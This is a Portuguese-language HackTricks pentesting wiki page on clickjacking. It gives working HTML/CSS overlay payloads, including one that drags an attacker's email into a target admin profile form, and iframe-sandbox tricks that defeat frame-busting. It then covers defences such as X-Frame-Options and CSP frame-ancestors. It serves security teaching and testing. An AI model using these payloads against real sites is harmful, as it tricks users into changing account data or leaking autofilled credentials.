Clickjacking

Reading time: 9 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

O que é Clickjacking

Em um ataque de clickjacking, um usuário é enganado para clicar em um elemento numa página web que está invisível ou disfarçado como outro elemento. Essa manipulação pode levar a consequências indesejadas para o usuário, como o download de malware, redirecionamento para páginas web maliciosas, fornecimento de credenciais ou informações sensíveis, transferências de dinheiro ou compras online de produtos.

Truque de pré-preenchimento de formulários

Às vezes é possível preencher o valor dos campos de um formulário utilizando parâmetros GET ao carregar a página. Um atacante pode abusar desse comportamento para preencher um formulário com dados arbitrários e enviar o payload de clickjacking para que o usuário pressione o botão Submit.

Preencher formulário com Drag&Drop

Se você precisa que o usuário preencha um formulário mas não quer pedir diretamente que ele escreva alguma informação específica (como o email e/ou uma senha específica que você conhece), você pode simplesmente pedir que ele Drag&Drop algo que escreverá os dados controlados por você como em this example.

Basic Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload em várias etapas

css

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Arrastar&Soltar + Clique payload

css

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Se você identificou um XSS que requer que o usuário clique em algum elemento para disparar o XSS e a página é vulnerável a Clickjacking, você pode abusar disso para enganar o usuário a clicar no botão/link.
Exemplo:
Você encontrou um self XSS em alguns detalhes privados da conta (detalhes que apenas você pode definir e ler). A página com o form para definir esses detalhes é vulnerável a Clickjacking e você pode pré-preencher o form com os parâmetros GET.
Um atacante poderia preparar um ataque de Clickjacking a essa página pré-preenchendo o form com o XSS payload e enganando o usuário para clicar em Submit no formulário. Então, quando o form for enviado e os valores forem modificados, o usuário executará o XSS.

DoubleClickjacking

Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the victim actually clicks a legit button in the victim page.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

warning

Esta técnica permite enganar o usuário para clicar em um único local na página da vítima, contornando todas as proteções contra Clickjacking. Assim o atacante precisa encontrar ações sensíveis que podem ser realizadas com apenas 1 clique, como prompts de OAuth aceitando permissões.

Extensões do navegador: DOM-based autofill clickjacking

Além de iframar páginas da vítima, atacantes podem mirar em elementos de UI de extensões do navegador que são injetados na página. Gerenciadores de senhas renderizam dropdowns de autofill próximos a inputs focados; ao focar um campo controlado pelo atacante e esconder/ocluir o dropdown da extensão (opacity/overlay/top-layer tricks), um clique coagido do usuário pode selecionar um item armazenado e preencher dados sensíveis em inputs controlados pelo atacante. Esta variante não requer exposição via iframe e funciona inteiramente por manipulação do DOM/CSS.

For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Defesas do lado do cliente

Scripts executados no lado do cliente podem executar ações para prevenir Clickjacking:

Garantir que a janela da aplicação seja a janela principal/top window.
Tornar todos os frames visíveis.
Evitar cliques em frames invisíveis.
Detectar e alertar usuários sobre possíveis tentativas de Clickjacking.

No entanto, esses scripts de frame-busting podem ser contornados:

Browsers' Security Settings: Alguns navegadores podem bloquear esses scripts com base nas configurações de segurança ou falta de suporte a JavaScript.
HTML5 iframe sandbox Attribute: Um atacante pode neutralizar scripts de frame buster definindo o atributo sandbox com os valores allow-forms ou allow-scripts sem allow-top-navigation. Isso impede que o iframe verifique se é a top window, por exemplo:

html

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. Para garantir a funcionalidade pretendida do site alvo, permissões adicionais como allow-same-origin e allow-modals podem ser necessárias, dependendo do tipo de ataque. Mensagens do console do navegador podem indicar quais permissões permitir.

Server-Side Defenses

X-Frame-Options

O X-Frame-Options HTTP response header informa os navegadores sobre a legitimidade de renderizar uma página em um ou , ajudando a prevenir Clickjacking:</p> <ul> <li>X-Frame-Options: deny - Nenhum domínio pode incorporar o conteúdo.</li> <li>X-Frame-Options: sameorigin - Apenas o próprio site pode incorporar o conteúdo.</li> <li>X-Frame-Options: allow-from https://trusted.com - Apenas o 'uri' especificado pode emoldurar a página.</li> <li>Note the limitations: if the browser doesn't support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.</li> </ul> <h4 id="content-security-policy-csp-frame-ancestors-directive"><a class="header" href="#content-security-policy-csp-frame-ancestors-directive">Content Security Policy (CSP) frame-ancestors directive</a></h4> <p><strong>frame-ancestors directive in CSP</strong> é o método recomendado para proteção contra Clickjacking:</p> <ul> <li>frame-ancestors 'none' - Similar to X-Frame-Options: deny.</li> <li>frame-ancestors 'self' - Similar to X-Frame-Options: sameorigin.</li> <li>frame-ancestors trusted.com - Similar to X-Frame-Options: allow-from.</li> </ul> <p>For instance, the following CSP only allows framing from the same domain:</p> <p>Content-Security-Policy: frame-ancestors 'self';</p> <p>Mais detalhes e exemplos complexos podem ser encontrados na <a href="https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors">frame-ancestors CSP documentation</a> e na <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors">Mozilla's CSP frame-ancestors documentation</a>.</p> <h3 id="content-security-policy-csp-with-child-src-and-frame-src"><a class="header" href="#content-security-policy-csp-with-child-src-and-frame-src">Content Security Policy (CSP) with child-src and frame-src</a></h3> <p><strong>Content Security Policy (CSP)</strong> é uma medida de segurança que ajuda a prevenir Clickjacking e outros ataques de injeção de código, especificando quais fontes o navegador deve permitir carregar conteúdo.</p> <h4 id="frame-src-directive"><a class="header" href="#frame-src-directive">frame-src Directive</a></h4> <ul> <li>Defines valid sources for frames.</li> <li>More specific than the default-src directive.</li> </ul> <pre><code>Content-Security-Policy: frame-src 'self' https://trusted-website.com; </code></pre> <p>Esta política permite frames da mesma origem (self) e https://trusted-website.com.</p> <h4 id="diretiva-child-src"><a class="header" href="#diretiva-child-src">Diretiva child-src</a></h4> <ul> <li>Introduzido no CSP nível 2 para definir fontes válidas para web workers e frames.</li> <li>Atua como fallback para frame-src e worker-src.</li> </ul> <pre><code>Content-Security-Policy: child-src 'self' https://trusted-website.com; </code></pre> <p>Esta política permite frames e workers da mesma origem (self) e https://trusted-website.com.</p> <p><strong>Notas de Uso:</strong></p> <ul> <li>Deprecação: child-src está sendo descontinuado em favor de frame-src e worker-src.</li> <li>Comportamento de fallback: Se frame-src estiver ausente, child-src é usado como fallback para frames. Se ambos estiverem ausentes, default-src é usado.</li> <li>Definição Estrita de Fontes: Inclua apenas fontes confiáveis nas diretivas para evitar exploração.</li> </ul> <h4 id="javascript-frame-breaking-scripts"><a class="header" href="#javascript-frame-breaking-scripts">JavaScript Frame-Breaking Scripts</a></h4> <p>Embora não sejam completamente infalíveis, JavaScript-based frame-busting scripts podem ser usados para impedir que uma página web seja inserida em um frame. Exemplo:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">if (top !== self) { top.location = self.location } </code></pre> <h4 id="empregando-anti-csrf-tokens"><a class="header" href="#empregando-anti-csrf-tokens">Empregando Anti-CSRF Tokens</a></h4> <ul> <li><strong>Validação de Token:</strong> Use anti-CSRF tokens em aplicações web para garantir que requisições que alteram o estado sejam feitas intencionalmente pelo usuário e não através de uma página Clickjacked.</li> </ul> <h2 id="referências"><a class="header" href="#referências">Referências</a></h2> <ul> <li><a href="https://portswigger.net/web-security/clickjacking"><strong>https://portswigger.net/web-security/clickjacking</strong></a></li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"><strong>https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html</strong></a></li> <li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/">DOM-based Extension Clickjacking (marektoth.com)</a></li> </ul> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Aprenda e pratique Hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Aprenda e pratique Hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Aprenda e pratique Hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Supporte o HackTricks</summary> <ul> <li>Confira os <a href="https://github.com/sponsors/carlospolop"><strong>planos de assinatura</strong></a>!</li> <li><strong>Junte-se ao</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>grupo do Discord</strong></a> ou ao <a href="https://t.me/peass"><strong>grupo do telegram</strong></a> ou <strong>siga</strong>-nos no <strong>Twitter</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Compartilhe truques de hacking enviando PRs para o</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> e <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> repositórios do github.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Cache Poisoning to DoS</span> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">Client Side Template Injection (CSTI)</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../elasticlunr.min.js"></script> <script src="../mark.min.js"></script>  <script src="../clipboard.min.js"></script> <script src="../highlight.js"></script> <script src="../book.js"></script>  <script src="../theme/pagetoc.js"></script> <script src="../theme/tabs.js"></script> <script src="../theme/ht_searcher.js"></script> <script src="../theme/sponsor.js"></script> <script src="../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>